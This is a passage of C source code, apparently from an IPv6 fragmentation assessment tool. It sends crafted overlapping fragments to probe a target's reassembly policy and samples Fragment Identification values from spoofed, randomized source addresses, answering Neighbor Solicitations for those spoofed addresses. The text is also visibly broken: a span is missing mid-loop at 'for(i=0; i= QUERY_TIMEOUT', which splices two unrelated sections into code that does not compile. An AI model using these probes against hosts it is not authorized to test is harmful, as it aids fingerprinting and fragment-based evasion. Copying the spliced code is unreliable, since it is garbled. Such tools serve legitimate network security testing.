exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); /* Initialize the table of results for the different tests */ for(i=0; i<5; i++) test[i]= TIMED_OUT; /* These two variables select the fragment "overlap" size for the tests, and the minimum fragment size. They are currently hardcoded, but will be configurable in future revisions of the tool. */ overlap=8; minfragsize= 8*10; /* Since the current version of the tool does not reassemble response packets, we need to prevent response packets from employing fragmentation. The maximum-sized packets that we send is composed of a 4*minfragsize payload plus IPv6 and ICMPv6 headers -- hence the check bellow. */ if(minfragsize > ((idata.mtu - sizeof(struct ip6_hdr) - sizeof(struct icmp6_hdr))/4)){ puts("Error: minimum fragment size is too large"); exit(EXIT_FAILURE); } if(overlap < 8 || (overlap%8) != 0 || overlap >= minfragsize){ puts("Error: Incorrect 'overlap' value"); exit(EXIT_FAILURE); } FD_ZERO(&sset); FD_SET(idata.fd, &sset); start= time(NULL); /* This "schedules" the sending of probes for different types of packets. At most two probes will be sent for each packet type. Probe #1 will be sent now, and resent after QUERY_TIMEOUT/2 seconds. Probe #2 will be sent in 1 second, and resent after QUERY_TIMEOUT/2 seconds... etc. This means that starting now, we send one probe for each packet type, one per second (to avoid congesting the network). And we resend the probes in after QUERY_TIMEOUT/2 seconds (hence we have QUERY_TIMEOUT/2 to wait for the responses of such probes). */ lastfrag1= start - QUERY_TIMEOUT/2; lastfrag2= start - QUERY_TIMEOUT/2 + 1; lastfrag3= start - QUERY_TIMEOUT/2 + 2; lastfrag4= start - QUERY_TIMEOUT/2 + 3; lastfrag5= start - QUERY_TIMEOUT/2 + 4; responses=0; while(1){ curtime=time(NULL); /* If we have already the timeout value, or already have results for each of the five tests, exit the loop */ if((curtime - start) >= QUERY_TIMEOUT || responses >= 5){ break; } if((curtime - lastfrag1) >= QUERY_TIMEOUT/2 && (test[0]== TIMED_OUT || test[0]==TIME_EXCEEDED)){ if(idata.verbose_f) puts("Sending Fragments for Test #1...."); id= random(); if(send_fragment2(&idata, sizeof(struct icmp6_hdr)+minfragsize*2-overlap, id, 0, minfragsize, \ FIRST_FRAGMENT, block1) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize-overlap, minfragsize, \ LAST_FRAGMENT, block6) == -1){ } lastfrag1=curtime; continue; } if((curtime - lastfrag2) >= QUERY_TIMEOUT/2 && (test[1]== TIMED_OUT || test[1]==TIME_EXCEEDED)){ if(idata.verbose_f) puts("Sending Fragments for Test #2...."); id= random(); if(send_fragment2(&idata, sizeof(struct icmp6_hdr)+minfragsize * 3-overlap, id, 0, minfragsize, \ FIRST_FRAGMENT, block2) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize * 2-overlap, minfragsize, \ LAST_FRAGMENT, block6) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize-overlap, minfragsize, \ MIDDLE_FRAGMENT, block7) == -1){ } lastfrag2=curtime; continue; } if((curtime - lastfrag3) >= QUERY_TIMEOUT/2 && (test[2]== TIMED_OUT || test[2]==TIME_EXCEEDED)){ if(idata.verbose_f) puts("Sending Fragments for Test #3...."); id= random(); if(send_fragment2(&idata, sizeof(struct icmp6_hdr)+minfragsize * 3-overlap, id, 0, minfragsize, \ FIRST_FRAGMENT, block3) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize * 2-overlap, minfragsize, \ LAST_FRAGMENT, block6) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize, minfragsize, MIDDLE_FRAGMENT, \ block7) == -1){ } lastfrag3=curtime; continue; } if((curtime - lastfrag4) >= QUERY_TIMEOUT/2 && (test[3]== TIMED_OUT || test[3]==TIME_EXCEEDED)){ if(idata.verbose_f) puts("Sending Fragments for Test #4...."); id= random(); if(send_fragment2(&idata, sizeof(struct icmp6_hdr)+minfragsize *4, id, 0, minfragsize, FIRST_FRAGMENT, \ block4) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize * 2, minfragsize, MIDDLE_FRAGMENT, \ block6) == -1){ } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize, minfragsize *3, LAST_FRAGMENT, \ block7) == -1){ } lastfrag4=curtime; continue; } if((curtime - lastfrag5) >= QUERY_TIMEOUT/2 && (test[4]== TIMED_OUT || test[4]==TIME_EXCEEDED)){ if(idata.verbose_f) puts("Sending Fragments for Test #5...."); id= random(); if(send_fragment2(&idata, sizeof(struct icmp6_hdr)+minfragsize * 4 - overlap, id, 0, minfragsize, \ FIRST_FRAGMENT, block5) == -1){ puts("Error when writing fragment"); exit(EXIT_FAILURE); } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize * 2, minfragsize, MIDDLE_FRAGMENT, \ block6) == -1){ puts("Error when writing fragment"); exit(EXIT_FAILURE); } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize * 3 - overlap, minfragsize, \ LAST_FRAGMENT, block7) == -1){ puts("Error when writing fragment"); exit(EXIT_FAILURE); } if(send_fragment2(&idata, 0, id, sizeof(struct icmp6_hdr)+minfragsize, minfragsize, MIDDLE_FRAGMENT, \ block8) == -1){ puts("Error when writing fragment"); exit(EXIT_FAILURE); } lastfrag5=curtime; } rset= sset; #if !defined(sun) && !defined(__sun) && !defined(__linux__) timeout.tv_usec=0; timeout.tv_sec= 1; #else timeout.tv_usec=10000; timeout.tv_sec= 0; #endif if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } #if defined(sun) || defined(__sun) || defined(__linux__) if(TRUE){ #else if(sel && FD_ISSET(idata.fd, &rset)){ #endif /* Read a packet (Echo Reply, ICMPv6 Error, or Neighbor Solicitation) */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK) && pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK) && !localaddr_f && \ is_eq_in6_addr(&(pkt_ns->nd_ns_target), &idata.srcaddr)){ if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else if( (pkt_icmp6->icmp6_type == ICMP6_ECHO_REPLY) || (pkt_icmp6->icmp6_type == ICMP6_TIME_EXCEEDED)){ if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)) continue; switch(pkt_icmp6->icmp6_type){ case ICMP6_ECHO_REPLY: process_icmp6_echo(&idata, pkthdr, pktdata, test, &responses); break; case ICMP6_TIME_EXCEEDED: process_icmp6_timed(&idata, pkthdr, pktdata, test); break; } } } } } } for(i=0;i<5;i++){ printf("Test #%u: ", (i+1)); switch(test[i]){ case FIRST_COPY: puts("Target preferred first copy of overlapping data"); break; case LAST_COPY: puts("Target preferred last copy of overlapping data"); break; case TIME_EXCEEDED: puts("Received ICMPv6 Time Exceeded error message (fragments discarded)"); break; case TIMED_OUT: puts("Timed out (fragments discarded without notification)"); break; case UNKNOWN_COPY: puts("Unknown pattern in response (shouldn't happen!)"); break; } } exit(EXIT_SUCCESS); } /* Assess the Fragment ID generation policy */ if(fragidp_f){ puts("Identifying the 'Fragment ID' generation policy of the target node...."); /* Set filter for receiving Neighbor Solicitations, and fragmented ICMPv6 Echo Responses */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6NSFRAG_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); FD_ZERO(&sset); FD_SET(idata.fd, &sset); if(gettimeofday(&startt, NULL) == -1){ if(idata.verbose_f) perror("frag6"); exit(EXIT_FAILURE); } lastfrag1t.tv_sec=0; lastfrag1t.tv_usec=0; ntest1=0; ntest2=0; icmp6_sig= random(); testtype= FIXED_ORIGIN; if(idata.srcprefix_f){ randprefix=idata.srcaddr; randpreflen=idata.srcpreflen; } else{ randprefix= idata.srcaddr; randpreflen=64; sanitize_ipv6_prefix(&randprefix, randpreflen); } while(1){ if(gettimeofday(&curtimet, NULL) == -1){ if(idata.verbose_f) perror("scan6"); exit(EXIT_FAILURE); } /* If we were doing tests from a single origin, and we have reached the assessment timeout or already have enough samples, we must now sample from multiple origins. */ if( testtype==FIXED_ORIGIN && (is_time_elapsed(&curtimet, &startt, FID_ASSESS_TIMEOUT * 1000000) || ntest1 >= NSAMPLES)){ testtype= MULTI_ORIGIN; addr_sig= random(); addr_key= random(); startt= curtimet; continue; } else if( testtype==MULTI_ORIGIN && (is_time_elapsed(&curtimet, &startt, FID_ASSESS_TIMEOUT * 1000000) || ntest2 >= NSAMPLES)){ break; } /* lastfrag1 contains the time the last time we sent probe packets. Probes are sent every FID_ASSESS_DELTA uses to avoid packet reordering. XXX: Eventually we should infer reordering in the sample data and order the samples if necessary. */ if(is_time_elapsed(&curtimet, &lastfrag1t, FID_ASSESS_DELTA)){ if(testtype == FIXED_ORIGIN){ if(send_fid_probe(&idata) == -1){ puts("Error while sending packet"); exit(EXIT_FAILURE); } } else{ randomize_ipv6_addr(&(idata.srcaddr), &randprefix, randpreflen); /* * Two words of the Source IPv6 Address are specially encoded such that we only respond * to Neighbor Solicitations that target those addresses, and accept ICMPv6 Echo Replies * only if they are destined to those addresses */ idata.srcaddr.s6_addr32[2]= htonl((ntohl(idata.srcaddr.s6_addr32[2]) & 0xffff0000) | addr_sig); idata.srcaddr.s6_addr32[3]= htonl((ntohl(idata.srcaddr.s6_addr32[3]) & 0xffff0000) | \ ((uint16_t)(ntohl(idata.srcaddr.s6_addr32[3])>>16) ^ addr_key)); /* * XXX This trick is innefective with OpenBSD. Hence we don't try to prevent the * first-fragment of the response packet from being dropped. if(send_neighbor_solicit(&idata) == -1){ puts("Error while sending Neighbor Solicitation"); exit(EXIT_FAILURE); } */ if(send_fid_probe(&idata) == -1){ puts("Error while sending packet"); exit(EXIT_FAILURE); } } lastfrag1t=curtimet; continue; } rset= sset; #if !defined(sun) && !defined(__sun) && !defined(__linux__) timeout.tv_usec=0; timeout.tv_sec= 1; #else timeout.tv_usec=10000; timeout.tv_sec= 0; #endif if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } #if defined(sun) || defined(__sun) || defined(__linux__) if(TRUE){ #else if(sel && FD_ISSET(idata.fd, &rset)){ #endif /* Read a packet (Echo Reply, or Neighbor Solicitation) */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK) && \ pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6 && pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(testtype==FIXED_ORIGIN){ if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK) && \ !localaddr_f && is_eq_in6_addr(&(pkt_ns->nd_ns_target), &(idata.srcaddr))){ if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if( (ntohl(pkt_ns->nd_ns_target.s6_addr32[2]) & 0x0000ffff) != addr_sig || \ (ntohl(pkt_ns->nd_ns_target.s6_addr32[3]) & 0x0000ffff) != ( (ntohl(pkt_ns->nd_ns_target.s6_addr32[3])>>16) ^ addr_key)){ continue; } if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else if(pkt_ipv6->ip6_nxt == IPPROTO_FRAGMENT){ if( (pkt_end - (unsigned char *) pkt_ipv6) < \ (sizeof(struct ip6_hdr) + sizeof(struct ip6_frag) + sizeof(struct icmp6_hdr) + sizeof(uint32_t))) continue; pkt_fh= (struct ip6_frag *) ( (unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr)); if(pkt_fh->ip6f_nxt != IPPROTO_ICMPV6) continue; /* XXX We only sample non-first fragments (see below) */ if(!(pkt_fh->ip6f_offlg & IP6F_OFF_MASK)) continue; /* * XXX These checks were removed, since when assessing some implementations on a local * network, we never get the first fragment because it is discarded when it triggers ND. */ if(!(pkt_fh->ip6f_offlg & IP6F_OFF_MASK)){ pkt_icmp6= (struct icmp6_hdr *) ((unsigned char *)pkt_fh + sizeof(struct ip6_frag)); if(pkt_icmp6->icmp6_type != ICMP6_ECHO_REPLY) continue; if(ntohs(pkt_icmp6->icmp6_data16[0]) != getpid() ) continue; } if(testtype==FIXED_ORIGIN){ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.srcaddr))){ continue; } /* XXX Not used when sampling non-first fragments */ if(!(pkt_fh->ip6f_offlg & IP6F_OFF_MASK)){ if( *(uint32_t *)((unsigned char *)pkt_icmp6+ sizeof(struct icmp6_hdr)) != icmp6_sig){ continue; } } if(ntest1 >= NSAMPLES) continue; test1[ntest1]= ntohl(pkt_fh->ip6f_ident); ntest1++; } else{ if( (ntohl(pkt_ipv6->ip6_dst.s6_addr32[2]) & 0x0000ffff) != addr_sig || \ (ntohl(pkt_ipv6->ip6_dst.s6_addr32[3]) & 0x0000ffff) != ( (ntohl(pkt_ipv6->ip6_dst.s6_addr32[3])>>16) ^ addr_key)){ continue; } /* XXX Not used when sampling non-first fragments */ if(!(pkt_fh->ip6f_offlg & IP6F_OFF_MASK)){ if( *(uint32_t *)((unsigned char *)pkt_icmp6+ sizeof(struct icmp6_hdr)) != icmp6_sig){ continue; } } if(ntest2 >= NSAMPLES) continue; test2[ntest2]= ntohl(pkt_fh->ip6f_ident); ntest2++; } } } } } if(idata.verbose_f > 1){ printf("Sampled %u Fragment Identifications from single-origin probes\n", ntest1); for(i=0; i= QUERY_TIMEOUT || (!resp_f && lastfrag != 0) || (resp_f && gotresp_f))){ break; } if((curtime - lastfrag) >= nsleep){ puts("Sending Fragment(s)...."); frags=0; if(!foffset_f){ foffset= random(); } if(forder != LAST_FRAGMENT){ foffset= (foffset >> 3) << 3; } while(frags < nfrags){ if(send_fragment(&idata, fid_f?fid:random(), foffset, fsize_f?fsize:( ((MIN_FRAG_SIZE+(random()%400))>>3)<<3), \ forder, tstamp_f) == -1){ puts("Error sending packet"); exit(EXIT_FAILURE); } frags++; } lastfrag=curtime; continue; } rset= sset; #if defined(sun) || defined(__sun) || defined(__linux__) timeout.tv_usec=10000; timeout.tv_sec= 0; #else timeout.tv_usec=0; timeout.tv_sec= (lastfrag+nsleep)-curtime; #endif if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } #if defined(sun) || defined(__sun) || defined(__linux__) if(TRUE){ #else if(sel && FD_ISSET(idata.fd, &rset)){ #endif /* Read a packet (Echo Reply, ICMPv6 Error, or Neighbor Solicitation) */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK) && pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK) && !localaddr_f && \ is_eq_in6_addr(&(pkt_ns->nd_ns_target), &(idata.srcaddr))){ if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else if( (pkt_icmp6->icmp6_type == ICMP6_ECHO_REPLY) || (pkt_icmp6->icmp6_type == ICMP6_TIME_EXCEEDED)){ if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)){ continue; } /* Do a preliminar validation check on the ICMPv6 packet (packet size, Source Address, and Destination Address). */ if(!valid_icmp6_response(&idata, pkthdr, pktdata)){ continue; } switch(pkt_icmp6->icmp6_type){ case ICMP6_ECHO_REPLY: gotresp_f= TRUE; if(resp_f) print_icmp6_echo(&idata, pkthdr, pktdata); break; case ICMP6_TIME_EXCEEDED: gotresp_f= TRUE; if(resp_f) print_icmp6_timed(&idata, pkthdr, pktdata); break; } } } } } } exit(EXIT_SUCCESS); } exit(EXIT_SUCCESS); } /* * Function: print_icmp6_echo() * * Print information about a received ICMPv6 Echo Response packet */ void print_icmp6_echo(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata){ struct ip6_hdr *pkt_ipv6; time_t rtt; pkt_ipv6 = (struct ip6_hdr *) (pktdata + idata->linkhsize); if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } rtt= time(NULL) - *(time_t *) ( (unsigned char *) pkt_ipv6 + (sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr))); printf("ICMPv6 echo Reply from %s", pv6addr); if(rtt > 0) printf(" (RTT: %u second%s)\n", (uint32_t)rtt, (rtt>1)?"s":""); else puts(" (RTT: < 1 second)"); } /* * Function: print_icmp6_timed() * * Print information about a received ICMPv6 Time Exceeded error message */ void print_icmp6_timed(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata){ struct ip6_hdr *pkt_ipv6, *pkt_ipv6_ipv6; struct icmp6_hdr *pkt_icmp6, *pkt_icmp6_icmp6; struct ip6_ext *pkt_ext; struct ip6_frag *pkt_fh_fh; uint8_t pkt_prev_nh; time_t rtt; pkt_ipv6 = (struct ip6_hdr *) (pktdata + idata->linkhsize); pkt_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ipv6_ipv6= (struct ip6_hdr *) ((unsigned char *)pkt_icmp6+ sizeof(struct icmp6_hdr)); pkt_fh_fh= NULL; pkt_ext= (struct ip6_ext *) ((unsigned char *)pkt_ipv6_ipv6 + sizeof(struct ip6_hdr)); pkt_prev_nh= (pkt_ipv6_ipv6->ip6_nxt); while(pkt_prev_nh != IPPROTO_ICMPV6 && \ ( (unsigned char *)pkt_ext + (pkt_ext->ip6e_len * 8 + 1)) < pkt_end){ if(pkt_prev_nh == IPPROTO_FRAGMENT) pkt_fh_fh= (struct ip6_frag *) pkt_ext; pkt_prev_nh= pkt_ext->ip6e_nxt; pkt_ext= (struct ip6_ext *) ( (unsigned char *)pkt_ext + ((pkt_ext->ip6e_len + 1) * 8)); } if(pkt_prev_nh == IPPROTO_ICMPV6){ pkt_icmp6_icmp6= (struct icmp6_hdr *) pkt_ext; if( ((unsigned char *) pkt_icmp6_icmp6 + (sizeof(struct icmp6_hdr)+ sizeof(struct ip6_hdr)+ \ sizeof(struct ip6_frag)+sizeof(struct icmp6_hdr))) > pkt_end) return; } else{ return; } if(pkt_fh_fh == NULL) return; /* * We can only check the embedded ICMPv6 header if the embedded fragment is the first fragment of * a packet */ if(ntohs(pkt_fh_fh->ip6f_offlg & IP6F_OFF_MASK) == 0){ if(pkt_icmp6_icmp6->icmp6_type != ICMP6_ECHO_REQUEST){ return; } if(pkt_icmp6_icmp6->icmp6_data16[0] != htons(getpid())){ return; } } else{ return; } if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(tstamp_f){ pkt_ptr= ((unsigned char *) pkt_icmp6_icmp6+ sizeof(struct icmp6_hdr)); /* Verify our "checksum" */ if(*(uint32_t *)(pkt_ptr+sizeof(time_t)) != ((*(uint32_t *)pkt_ptr) ^ 0xabcdabcd)){ return; } rtt= time(NULL) - *(time_t *) pkt_ptr; printf("Response from %s: ICMPv6 Time Exceeded error message (Reassembly timeout: %lu seconds)\n", pv6addr, \ (LUI) rtt); } else printf("Response from %s: ICMPv6 Time Exceeded error message\n", pv6addr); } /* * Function: process_icmp6_echoinfo() * * Process ICMPv6 echo reply messages received in response to our probe packets that investigate * the fragment reassembly policy of a target */ void process_icmp6_echo(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata, unsigned char *test, unsigned int *responses){ struct ip6_hdr *pkt_ipv6; struct icmp6_hdr *pkt_icmp6; pkt_ipv6 = (struct ip6_hdr *) (pktdata + idata->linkhsize); pkt_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_ipv6 + sizeof(struct ip6_hdr)); if(test_frag_pattern( ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block1)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + \ sizeof(struct icmp6_hdr)+minfragsize*2-overlap)){ return; } if(test_frag_pattern( (unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr) + minfragsize-overlap), \ overlap, block1)){ test[0]= FIRST_COPY; } else if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize-overlap), \ overlap, block6)){ test[0]= LAST_COPY; } else{ test[0]= UNKNOWN_COPY; } (*responses)++; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block2)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + \ sizeof(struct icmp6_hdr)+minfragsize * 3-overlap)){ return; } if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize-overlap), overlap, block2)){ test[1]= FIRST_COPY; } else if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize-overlap), \ overlap, block7)){ test[1]= LAST_COPY; } else{ test[1]= UNKNOWN_COPY; } (*responses)++; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block3)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + \ sizeof(struct icmp6_hdr)+minfragsize * 3-overlap)){ return; } if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize * 2-overlap),\ overlap, block6)){ test[2]= FIRST_COPY; } else if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize * 2-overlap), \ overlap, block7)){ test[2]= LAST_COPY; } else{ test[2]= UNKNOWN_COPY; } (*responses)++; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block4)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + \ sizeof(struct icmp6_hdr)+minfragsize * 4)){ return; } if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize * 2), \ minfragsize, block6)){ test[3]= FIRST_COPY; } else if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize * 2), \ minfragsize, block7)){ test[3]= LAST_COPY; } else{ test[3]= UNKNOWN_COPY; } (*responses)++; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block5)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + \ sizeof(struct icmp6_hdr)+minfragsize * 4 - overlap)){ return; } if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize * 2), \ minfragsize, block6)){ test[4]= FIRST_COPY; } else if(test_frag_pattern((unsigned char *)pkt_icmp6+(sizeof(struct icmp6_hdr)+minfragsize * 2), \ minfragsize, block7)){ test[4]= LAST_COPY; } else{ test[4]= UNKNOWN_COPY; } (*responses)++; } else{ if(idata->verbose_f) puts("ICMPv6 Echo Reply for unknown probe type"); } } /* * Function: process_icmp6_timed() * * Process ICMPv6 Time Exceeded messages received in response to our probe packets that investigate * the fragment reassembly policy of a target */ void process_icmp6_timed(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata, unsigned char *test){ struct ip6_hdr *pkt_ipv6, *pkt_ipv6_ipv6; struct icmp6_hdr *pkt_icmp6, *pkt_icmp6_icmp6; struct ip6_ext *pkt_ext; struct ip6_frag *pkt_fh_fh; uint8_t pkt_prev_nh; pkt_ipv6 = (struct ip6_hdr *) (pktdata + idata->linkhsize); pkt_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ipv6_ipv6= (struct ip6_hdr *) ((unsigned char *)pkt_icmp6+ sizeof(struct icmp6_hdr)); pkt_fh_fh= NULL; pkt_ext= (struct ip6_ext *) ((unsigned char *)pkt_ipv6_ipv6 + sizeof(struct ip6_hdr)); pkt_prev_nh= (pkt_ipv6_ipv6->ip6_nxt); while(pkt_prev_nh != IPPROTO_ICMPV6 && \ ( (unsigned char *)pkt_ext + (pkt_ext->ip6e_len * 8 + 1)) < pkt_end){ if(pkt_prev_nh == IPPROTO_FRAGMENT) pkt_fh_fh= (struct ip6_frag *) pkt_ext; pkt_prev_nh= pkt_ext->ip6e_nxt; pkt_ext= (struct ip6_ext *) ( (unsigned char *)pkt_ext + ((pkt_ext->ip6e_len + 1) * 8)); } if(pkt_prev_nh == IPPROTO_ICMPV6){ pkt_icmp6_icmp6= (struct icmp6_hdr *) pkt_ext; if( ((unsigned char *) pkt_icmp6_icmp6 + (sizeof(struct icmp6_hdr)+ sizeof(struct ip6_hdr)+ \ sizeof(struct ip6_frag)+sizeof(struct icmp6_hdr))) > pkt_end) return; } else{ return; } if(pkt_fh_fh == NULL) return; /* * We can only check the embedded ICMPv6 header if the embedded fragment is the first fragment of * a packet */ if(ntohs(pkt_fh_fh->ip6f_offlg & IP6F_OFF_MASK) == 0){ if(pkt_icmp6_icmp6->icmp6_type != ICMP6_ECHO_REQUEST){ return; } if(pkt_icmp6_icmp6->icmp6_data16[0] != htons(getpid())){ return; } } else{ return; } if(test_frag_pattern( ((unsigned char *) pkt_icmp6_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block1)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr) + \ sizeof(struct ip6_frag) + sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr)+minfragsize)){ return; } else{ test[0]= TIME_EXCEEDED; } } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6_icmp6 + 